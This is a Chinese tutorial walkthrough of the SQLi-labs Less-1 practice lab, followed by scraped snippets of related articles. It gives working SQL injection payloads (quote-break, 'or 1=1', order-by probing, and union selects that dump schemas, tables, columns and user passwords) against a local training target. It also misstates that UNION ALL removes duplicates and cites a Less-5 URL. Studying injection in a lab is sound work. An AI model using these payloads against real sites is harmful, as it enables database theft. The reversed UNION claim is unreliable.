Sqli-labs less 1

Less-1

我们可以在http://127.0.0.1/sqllib/Less-5/?id=1后面直接添加一个 ‘ ,来看一下效果:

从上述错误当中,我们可以看到提交到sql中的1‘在经过sql语句构造后形成 ‘1‘‘ LIMIT 0,1,多加了一个 ‘ 。这种方式就是从错误信息中得到我们所需要的信息,那我们接下来想如何将多余的 ‘ 去掉呢?

尝试 ‘or 1=1--+

此时构造的sql语句就成了

Select ****** where id=‘1‘or 1=1--+‘ LIMIT 0,1

可以看到正常返回数据。

此处可以利用order by。Order by 对前面的数据进行排序,这里有三列数据,我们就只能用order by 3,超过3就会报错。

‘order by 4--+的结果显示结果超出。

最后从源代码中分析下为什么会造成注入?

Sql语句为$sql="SELECT * FROM users WHERE id=‘$id‘ LIMIT 0,1";

Id参数在拼接sql语句时,未对id进行任何的过滤等操作,所以当提交 ‘or 1=1--+,直接构造的sql语句就是

SELECT * FROM users WHERE id=‘1‘or 1=1--+ LIMIT 0,1

这条语句因or 1=1 所以为永恒真。

?

?

此外,此处介绍union联合注入,union的作用是将两个sql语句进行联合。Union可以从下面的例子中可以看出,强调一点:union前后的两个sql语句的选择列数要相同才可以。Union all与union 的区别是增加了去重的功能。我们这里根据上述background的知识,进行information_schema 知识的应用。

http://127.0.0.1/sqllib/Less-1/?id=-1‘union select 1,2--+

当id的数据在数据库中不存在时,(此时我们可以id=-1,两个sql语句进行联合操作时,当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返回了我们构造的union 的数据。

爆数据库

http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--+

此时的sql语句为SELECT * FROM users WHERE id=‘-1‘union select 1,group_concat(schema_name),3 from information_schema.schemata--+ LIMIT 0,1

?

爆security数据库的数据表

http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

此时的sql语句为SELECT * FROM users WHERE id=‘-1‘union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security‘--+ LIMIT 0,1

?

爆users表的列

http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+

此时的sql语句为SELECT * FROM users WHERE id=‘-1‘union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘--+ LIMIT 0,1

?

?

爆数据

http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,username,password%20from%20users%20where%20id=2--+

此时的sql语句为SELECT * FROM users WHERE id=‘-1‘union select 1,username,password from users where id=2--+ LIMIT 0,1

?

?

Less1-less4都可以利用上述union操作进行注入。下面就不进行赘述了。

时间: 2024-11-05 13:50:31

Sqli-labs less 1的相关文章

Sqli labs系列-less-1 详细篇

要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了,我就开始弄这个,毕竟这个里面涉及到的 SQL 注入知识很全,我贴一个下载地址:Sqli labs系列下载地址 对了还有我这个系列的头顶图,那个图是某个低调群的活跃用户装X墙,纯属装 X ,娱乐着玩了,大家别当真哈. 开了正文开始了! 首先我们先开始第一关,然后构造下注入环境,也就是在 http://

Sqli labs系列-less-2 详细篇

就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊...好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比... 好了,不扯了,现在开始扯这个第二关. 原本想着明天闲着没事了玩玩吧,后来,我今天也是闲的没事,我就继续开始玩玩吧. 结果玩

Sqli labs相关环境的下载与安装

我们在学习这项内容之前,需要安装两样应用程序,下载路径的搜索比较麻烦,这里提供两个已知的百度网盘网址及其提取码以供使用: 1.安装phpstudy; 链接:https://pan.baidu.com/s/1yeOLf7Mty5bEGLPUSodILg 提取码:y3vl 2.安装sqli-labs-masters; 将sqli-labs-masters解压,放到phpStudy安装目录下的/PHPTutorial/WWW 链接:https://pan.baidu.com/s/1aKbc0fnsLg

sqli labs注入记录(Less-1至Less-10)

Less-1:基于错误的GET单引号字符型注入 我们首先注入一个单引号’,出现SQL语法错误,多出一个单引号,后面闭合语句也是用的单引号: http://127.0.0.1/sqli_labs/Less-1/?id=1’ 再次注入一条SQL语句,因为条件永远为真,响应正常: http://127.0.0.1/sqli_labs/Less-1/?id=1' and '1'='1 下面猜解字段数: http://127.0.0.1/sqli_labs/Less-1/?id=1' order by 1

搭建sqli靶场

前言: sqli是一个印度程序员编写的,用来学习sql注入的一个游戏教程 sqli这个靶场对php7.0是不兼容的(因为一些函数在php7中被删除了),所以搭建的时候要下载php5,如果你的系统要下载php5有点麻烦的话,可以看我文章的最后,那里有解决方法. 正文: 下载 sqli 靶场 https://github.com/Audi-1/sqli-labs linux系统:解压缩到 /var/www/html/ 目录下(如果安装apache时改变了路径,就解压到改变的路径下) mv 文件名 /

SSL Labs: Increased Penalty When TLS 1.2 Is Not Supported

https://community.qualys.com/blogs/securitylabs/2015/05/22/ssl-labs-increased-penalty-when-tls-12-is-not-supported Earlier this week we released SSL Labs 1.17.10, whose main purpose was to increase the penalty when RC4 is used with modern protocols (

silicon labs 代理商

http://www.silabs.com/buysample/pages/contact-sales.aspx?SearchLocation=China Silicon Labs Authorized Semiconductor Distributors: China To order Silicon Labs products, contact a distributor below: China Distributor Office Location Telephone Email Arr

ThinkPHP 3.1.3及之前的版本使用不当可造成SQLi

Lib/Core/Model.class.php中解析SQL语句的函数parseSql没有对SQL语句进行过滤,使用不当可导致SQL注入.(哈哈,其实用再安全的框架使用不当都可能造成SQLi) 函数: /** * 解析SQL语句 * @access public * @param string $sql SQL指令 * @param boolean $parse 是否需要解析SQL * @return string */ protected function parseSql($sql,$par

Rancher Labs亮相SCALE15x:三大演讲福利放送

为期四天的第15届SCALE(The Southern California Linux Expo)已落下帷幕,这是美国规模最大的开源软件和Linux用户的盛会之一. Rancher Labs的工程师们受组委会之邀进行了三个主题演讲: 重构到微服务:实践案例分享 如何为容器运行构建CNI插件 管理大规模Kubernetes面临的挑战及经验教训 演讲内容及PPT请文内自取! SCALE(The Southern California Linux Expo,南加州Linux博览会)是美国规模最大的开

artdialog对话框 三种样式 网址:http://www.planeart.cn/demo/artDialog/_doc/labs.html

摇头效果 类似与wordpress登录失败后登录框可爱的左右晃动效果 // 2011-07-17 更新 artDialog.fn.shake = function (){ var style = this.DOM.wrap[0].style, p = [4, 8, 4, 0, -4, -8, -4, 0], fx = function () { style.marginLeft = p.shift() + 'px'; if (p.length <= 0) { style.marginLeft =